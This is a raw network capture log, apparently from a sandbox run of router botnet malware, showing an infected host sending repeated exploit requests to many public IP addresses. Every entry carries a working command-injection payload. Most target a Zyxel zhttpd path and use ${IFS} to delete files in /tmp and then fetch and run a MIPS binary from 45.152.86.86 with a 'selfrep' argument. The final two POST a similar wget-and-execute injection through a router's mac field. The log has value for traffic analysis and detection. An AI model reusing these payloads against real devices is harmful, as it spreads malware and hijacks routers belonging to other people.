                                        Mar 31, 2024 09:21:34.040750027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5412192.168.2.23554062.191.187.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.040788889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5413192.168.2.2337776154.147.115.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.040824890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5414192.168.2.2360614181.218.173.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.040873051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5415192.168.2.2349960135.196.191.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.040913105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5416192.168.2.2348390133.102.255.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.040951967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5417192.168.2.2356636115.171.254.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.041002989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5418192.168.2.235548466.85.156.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.041062117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5419192.168.2.2359428104.131.229.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.041100979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5420192.168.2.2349460129.78.101.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.049201012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5421192.168.2.2336346203.108.128.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.049235106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5422192.168.2.2347024109.139.191.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.049268961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5423192.168.2.233882266.21.41.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.049325943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5424192.168.2.234644251.133.222.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.049360037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5425192.168.2.2354606164.147.8.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.049411058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5426192.168.2.2357122202.128.254.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.049449921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5427192.168.2.233929814.112.112.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.049498081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5428192.168.2.2352528177.24.137.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.049525023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5429192.168.2.2339166177.183.213.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.049599886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5430192.168.2.2352034213.59.219.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.049637079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5431192.168.2.2357628180.98.206.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.049674034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5432192.168.2.2344462160.23.141.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.049726963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5433192.168.2.235088035.110.74.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.049758911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5434192.168.2.2359496203.1.232.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.049813986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5435192.168.2.2354820199.179.96.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.049846888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5436192.168.2.2342178204.137.17.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.049921036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5437192.168.2.2343606202.80.104.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.049952984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5438192.168.2.2344514193.238.167.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.049992085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5439192.168.2.2345122180.151.163.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.050040960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5440192.168.2.2349536195.27.133.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.050065041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5441192.168.2.2355464189.88.200.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.050128937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5442192.168.2.2347294171.145.139.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.050173998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5443192.168.2.2347298166.85.109.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.050213099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5444192.168.2.2354768164.70.86.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.050257921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5445192.168.2.234495632.194.142.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.050313950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5446192.168.2.23580964.37.120.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.050364971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5447192.168.2.2349580164.34.219.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.050400972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5448192.168.2.234071645.133.122.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.050447941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5449192.168.2.233661863.23.57.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.050498009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5450192.168.2.2355756163.16.50.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.050529957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5451192.168.2.235668457.245.125.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.050609112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5452192.168.2.2341572121.44.166.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.050642967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5453192.168.2.233800280.248.214.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.050688028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5454192.168.2.2339796209.163.202.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.050728083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5455192.168.2.2360830116.142.140.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.050781012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5456192.168.2.2343626211.7.33.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.050820112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5457192.168.2.235043243.133.238.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.050853014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5458192.168.2.233755224.87.91.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.050911903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5459192.168.2.2341746180.52.2.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.050951004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5460192.168.2.2332988212.47.109.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.051003933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5461192.168.2.233616285.120.175.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.051064968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5462192.168.2.234325258.84.107.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:35.029107094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5463192.168.2.234874888.47.58.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:35.029287100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5464192.168.2.2335746181.163.29.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:35.029337883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5465192.168.2.2336458121.162.65.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:35.029393911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5466192.168.2.235234265.235.8.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:35.029439926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5467192.168.2.2334104189.166.71.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:35.029480934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5468192.168.2.235383662.184.233.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:35.029515028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5469192.168.2.2353736155.77.122.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:36.058758974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5470192.168.2.2350004210.252.248.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:36.058798075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5471192.168.2.233437286.152.34.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:36.058936119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5472192.168.2.2337672110.230.130.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:36.058984041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5473192.168.2.235562888.136.181.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:37.069364071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5474192.168.2.2360856195.208.94.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:37.069436073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5475192.168.2.2333308172.65.27.1288080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:38.045770884 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5476192.168.2.2355714104.20.213.1238080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:38.184672117 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
